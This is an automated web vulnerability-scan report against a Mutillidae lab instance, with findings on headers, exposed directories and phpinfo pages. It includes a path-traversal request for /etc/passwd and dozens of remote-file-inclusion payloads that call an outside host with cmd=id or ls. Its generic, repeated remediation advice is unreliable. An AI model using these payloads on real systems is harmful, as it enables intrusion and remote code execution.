Vulnix Deep Web Report - Target: http://192.168.78.102/mutillidae
Date: Tue Dec 30 01:14:29 PM EST 2025
-----------------------------------------------------------------
[MEDIUM  ] Nmap: http-methods
Evidence: Supported Methods: GET HEAD POST OPTIONS
Remediation: Review server config.

-----------------------------------------------------------------
[MEDIUM  ] Nmap: http-headers
Evidence: Date: Tue, 30 Dec 2025 17:32:23 GMT   Server: Apache/2.2.8 (Ubuntu) DAV/2   X-Powered-By: PHP/5.2.4-2ubuntu5.10   Connection: close   Content-Type: text/html      (Request type: HEAD)
Remediation: Review server config.

-----------------------------------------------------------------
[MEDIUM  ] Nmap: http-enum
Evidence: /tikiwiki/: Tikiwiki   /test/: Test page   /phpinfo.php: Possible information file   /phpMyAdmin/: phpMyAdmin   /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'   /icons/: Potentially interesting folder w/ directory listing   /index/: Potentially interesting folder
Remediation: Review server config.

-----------------------------------------------------------------
[MEDIUM  ] Nmap: http-server-header
Evidence: Apache/2.2.8 (Ubuntu) DAV/2
Remediation: Review server config.

-----------------------------------------------------------------
[MEDIUM  ] Nmap: rpcinfo
Evidence: program version    port/proto  service   100000  2            111/tcp   rpcbind   100000  2            111/udp   rpcbind   100003  2,3,4       2049/tcp   nfs   100003  2,3,4       2049/udp   nfs   100005  1,2,3      49530/tcp   mountd   100005  1,2,3      60435/udp   mountd   100021  1,3,4      37946/tcp   nlockmgr   100021  1,3,4      54650/udp   nlockmgr   100024  1          49813/udp   status   100024  1          55586/tcp   status
Remediation: Review server config.

-----------------------------------------------------------------
[MEDIUM  ] Nmap: http-methods
Evidence: Supported Methods: GET HEAD POST OPTIONS
Remediation: Review server config.

-----------------------------------------------------------------
[MEDIUM  ] Nmap: http-headers
Evidence: Server: Apache-Coyote/1.1   Content-Type: text/html;charset=ISO-8859-1   Date: Tue, 30 Dec 2025 17:32:23 GMT   Connection: close      (Request type: HEAD)
Remediation: Review server config.

-----------------------------------------------------------------
[MEDIUM  ] Nmap: http-enum
Evidence: /admin/: Possible admin folder   /admin/index.html: Possible admin folder   /admin/login.html: Possible admin folder   /admin/admin.html: Possible admin folder   /admin/account.html: Possible admin folder   /admin/admin_login.html: Possible admin folder   /admin/home.html: Possible admin folder   /admin/admin-login.html: Possible admin folder   /admin/adminLogin.html: Possible admin folder   /admin/controlpanel.html: Possible admin folder   /admin/cp.html: Possible admin folder   /admin/index.jsp: Possible admin folder   /admin/login.jsp: Possible admin folder   /admin/admin.jsp: Possible admin folder   /admin/home.jsp: Possible admin folder   /admin/controlpanel.jsp: Possible admin folder   /admin/admin-login.jsp: Possible admin folder   /admin/cp.jsp: Possible admin folder   /admin/account.jsp: Possible admin folder   /admin/admin_login.jsp: Possible admin folder   /admin/adminLogin.jsp: Possible admin folder   /manager/html/upload: Apache Tomcat (401 Unauthorized)   /manager/html: Apache Tomcat (401 Unauthorized)   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload   /admin/jscript/upload.html: Lizard Cart/Remote File upload   /webdav/: Potentially interesting folder
Remediation: Review server config.

-----------------------------------------------------------------
[LOW     ] /mutillidae/: Cookie PHPSESSID created without the httponly 
Evidence: /mutillidae/: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[MEDIUM  ] /mutillidae/: Retrieved x-powered-by header: PHP/5.2.4-2ubun
Evidence: /mutillidae/: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[MEDIUM  ] /mutillidae/: The anti-clickjacking X-Frame-Options header i
Evidence: /mutillidae/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[MEDIUM  ] /mutillidae/: Uncommon header 'logged-in-user' found, with c
Evidence: /mutillidae/: Uncommon header 'logged-in-user' found, with contents: .
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[MEDIUM  ] /mutillidae/: The X-Content-Type-Options header is not set. 
Evidence: /mutillidae/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[MEDIUM  ] /mutillidae/robots.txt: Server may leak inodes via ETags, he
Evidence: /mutillidae/robots.txt: Server may leak inodes via ETags, header found with file /mutillidae/robots.txt, inode: 92442, size: 160, mtime: Tue May 10 17:00:04 2011. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /robots.txt: contains 6 entries which should be manually vie
Evidence: /robots.txt: contains 6 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[MEDIUM  ] /mutillidae/index: Uncommon header 'tcn' found, with content
Evidence: /mutillidae/index: Uncommon header 'tcn' found, with contents: list.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /index: Apache mod_negotiation is enabled with MultiViews, w
Evidence: /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[MEDIUM  ] Apache/2.2.8 appears to be outdated (current is at least Apa
Evidence: Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRA
Evidence: OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /: Web Server returns a valid response with junk HTTP method
Evidence: /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /: HTTP TRACE method is active which suggests the host is vu
Evidence: /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/phpMyAdmin/db_details_importdocsql.php?submit_sh
Evidence: /mutillidae/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. See: https://seclists.org/fulldisclosure/2003/Jun/536
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?page=../../../../../../../../../../etc
Evidence: /mutillidae/index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php).
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/index.php: PHP include error may indicate local 
Evidence: /mutillidae/index.php: PHP include error may indicate local or remote file inclusion is possible.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/phpinfo.php: Output from the phpinfo() function 
Evidence: /mutillidae/phpinfo.php: Output from the phpinfo() function was found.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP r
Evidence: /mutillidae/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP r
Evidence: /mutillidae/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP r
Evidence: /mutillidae/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP r
Evidence: /mutillidae/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/home/: This might be interesting.
Evidence: /mutillidae/home/: This might be interesting.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/includes/: Directory indexing found.
Evidence: /mutillidae/includes/: Directory indexing found.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/includes/: This might be interesting.
Evidence: /mutillidae/includes/: This might be interesting.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/login/: This might be interesting.
Evidence: /mutillidae/login/: This might be interesting.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/passwords/: Directory indexing found.
Evidence: /mutillidae/passwords/: Directory indexing found.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/passwords/: This might be interesting.
Evidence: /mutillidae/passwords/: This might be interesting.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/register/: This might be interesting.
Evidence: /mutillidae/register/: This might be interesting.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/phpinfo.php: PHP is installed, and a test script
Evidence: /mutillidae/phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/index.php: PHP is installed, and a test script w
Evidence: /mutillidae/index.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/images/: Directory indexing found.
Evidence: /mutillidae/images/: Directory indexing found.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/styles/: Directory indexing found.
Evidence: /mutillidae/styles/: Directory indexing found.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[MEDIUM  ] /mutillidae/config.inc: DotBr 0.1 configuration file include
Evidence: /mutillidae/config.inc: DotBr 0.1 configuration file includes usernames and passwords. See: OSVDB-5092
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/?_CONFIG[files][functions_page]=http://blog.cirt
Evidence: /mutillidae/?_CONFIG[files][functions_page]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/?npage=-1&content_dir=http://blog.cirt.net/rfiin
Evidence: /mutillidae/?npage=-1&content_dir=http://blog.cirt.net/rfiinc.txt%00&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/?npage=1&content_dir=http://blog.cirt.net/rfiinc
Evidence: /mutillidae/?npage=1&content_dir=http://blog.cirt.net/rfiinc.txt%00&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/?show=http://blog.cirt.net/rfiinc.txt?: Remote F
Evidence: /mutillidae/?show=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?1=lol&PAGES[lol]=http://blog.cirt.net/
Evidence: /mutillidae/index.php?1=lol&PAGES[lol]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?AML_opensite=http://blog.cirt.net/rfii
Evidence: /mutillidae/index.php?AML_opensite=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?AMV_openconfig=1&AMV_serverpath=http:/
Evidence: /mutillidae/index.php?AMV_openconfig=1&AMV_serverpath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?CONFIG[MWCHAT_Libs]=http://blog.cirt.n
Evidence: /mutillidae/index.php?CONFIG[MWCHAT_Libs]=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?ConfigDir=http://blog.cirt.net/rfiinc.
Evidence: /mutillidae/index.php?ConfigDir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?DIR_PLUGINS=http://blog.cirt.net/rfiin
Evidence: /mutillidae/index.php?DIR_PLUGINS=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?G_JGALL[inc_path]=http://blog.cirt.net
Evidence: /mutillidae/index.php?G_JGALL[inc_path]=http://blog.cirt.net/rfiinc.txt%00: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?HomeDir=http://blog.cirt.net/rfiinc.tx
Evidence: /mutillidae/index.php?HomeDir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?Lang=AR&Page=http://blog.cirt.net/rfii
Evidence: /mutillidae/index.php?Lang=AR&Page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?Madoa=http://blog.cirt.net/rfiinc.txt?
Evidence: /mutillidae/index.php?Madoa=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?RP_PATH=http://blog.cirt.net/rfiinc.tx
Evidence: /mutillidae/index.php?RP_PATH=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?_REQUEST=&_REQUEST[option]=com_content
Evidence: /mutillidae/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?_REQUEST=&_REQUEST[option]=com_content
Evidence: /mutillidae/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?abg_path=http://blog.cirt.net/rfiinc.t
Evidence: /mutillidae/index.php?abg_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?abs_path=http://blog.cirt.net/rfiinc.t
Evidence: /mutillidae/index.php?abs_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?abs_path=http://blog.cirt.net/rfiinc.t
Evidence: /mutillidae/index.php?abs_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?adduser=true&lang=http://blog.cirt.net
Evidence: /mutillidae/index.php?adduser=true&lang=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?adodb=http://blog.cirt.net/rfiinc.txt:
Evidence: /mutillidae/index.php?adodb=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?ads_file=http://blog.cirt.net/rfiinc.t
Evidence: /mutillidae/index.php?ads_file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?arquivo=http://blog.cirt.net/rfiinc.tx
Evidence: /mutillidae/index.php?arquivo=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?back=http://blog.cirt.net/rfiinc.txt: 
Evidence: /mutillidae/index.php?back=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?base==http://blog.cirt.net/rfiinc.txt:
Evidence: /mutillidae/index.php?base==http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?basePath=http://blog.cirt.net/rfiinc.t
Evidence: /mutillidae/index.php?basePath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?bibtexrootrel=http://blog.cirt.net/rfi
Evidence: /mutillidae/index.php?bibtexrootrel=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?blog_dc_path=http://blog.cirt.net/rfii
Evidence: /mutillidae/index.php?blog_dc_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?blog_theme=http://blog.cirt.net/rfiinc
Evidence: /mutillidae/index.php?blog_theme=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?body=http://blog.cirt.net/rfiinc.txt: 
Evidence: /mutillidae/index.php?body=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?class_path=http://blog.cirt.net/rfiinc
Evidence: /mutillidae/index.php?class_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?classified_path=http://blog.cirt.net/r
Evidence: /mutillidae/index.php?classified_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?cms=http://blog.cirt.net/rfiinc.txt?: 
Evidence: /mutillidae/index.php?cms=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?config[\"sipssys\"]=http://blog.cirt.n
Evidence: /mutillidae/index.php?config[\"sipssys\"]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?config[root_ordner]=http://blog.cirt.n
Evidence: /mutillidae/index.php?config[root_ordner]=http://blog.cirt.net/rfiinc.txt?&cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?config[root_ordner]=http://blog.cirt.n
Evidence: /mutillidae/index.php?config[root_ordner]=http://blog.cirt.net/rfiinc.txt?cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?config_atkroot=http://blog.cirt.net/rf
Evidence: /mutillidae/index.php?config_atkroot=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[MEDIUM  ] /mutillidae/index.php?configuration=http://blog.cirt.net/rfi
Evidence: /mutillidae/index.php?configuration=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?custom_admin_path=http://blog.cirt.net
Evidence: /mutillidae/index.php?custom_admin_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?dateiPfad=http://blog.cirt.net/rfiinc.
Evidence: /mutillidae/index.php?dateiPfad=http://blog.cirt.net/rfiinc.txt?&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?de=http://blog.cirt.net/rfiinc.txt: Re
Evidence: /mutillidae/index.php?de=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?dept=http://blog.cirt.net/rfiinc.txt: 
Evidence: /mutillidae/index.php?dept=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?do=http://blog.cirt.net/rfiinc.txt: Re
Evidence: /mutillidae/index.php?do=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?exec=http://blog.cirt.net/rfiinc.txt?:
Evidence: /mutillidae/index.php?exec=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?ext=http://blog.cirt.net/rfiinc.txt: R
Evidence: /mutillidae/index.php?ext=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?faq_path=http://blog.cirt.net/rfiinc.t
Evidence: /mutillidae/index.php?faq_path=http://blog.cirt.net/rfiinc.txt?&cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?file_name[]=http://blog.cirt.net/rfiin
Evidence: /mutillidae/index.php?file_name[]=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?file_Nikto[]=http://blog.cirt.net/rfii
Evidence: /mutillidae/index.php?file_Nikto[]=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?file_path=http://blog.cirt.net/rfiinc.
Evidence: /mutillidae/index.php?file_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?fileloc=http://blog.cirt.net/rfiinc.tx
Evidence: /mutillidae/index.php?fileloc=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?from=http://blog.cirt.net/rfiinc.txt: 
Evidence: /mutillidae/index.php?from=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?func=http://blog.cirt.net/rfiinc.txt?:
Evidence: /mutillidae/index.php?func=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?function=http://blog.cirt.net/rfiinc.t
Evidence: /mutillidae/index.php?function=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
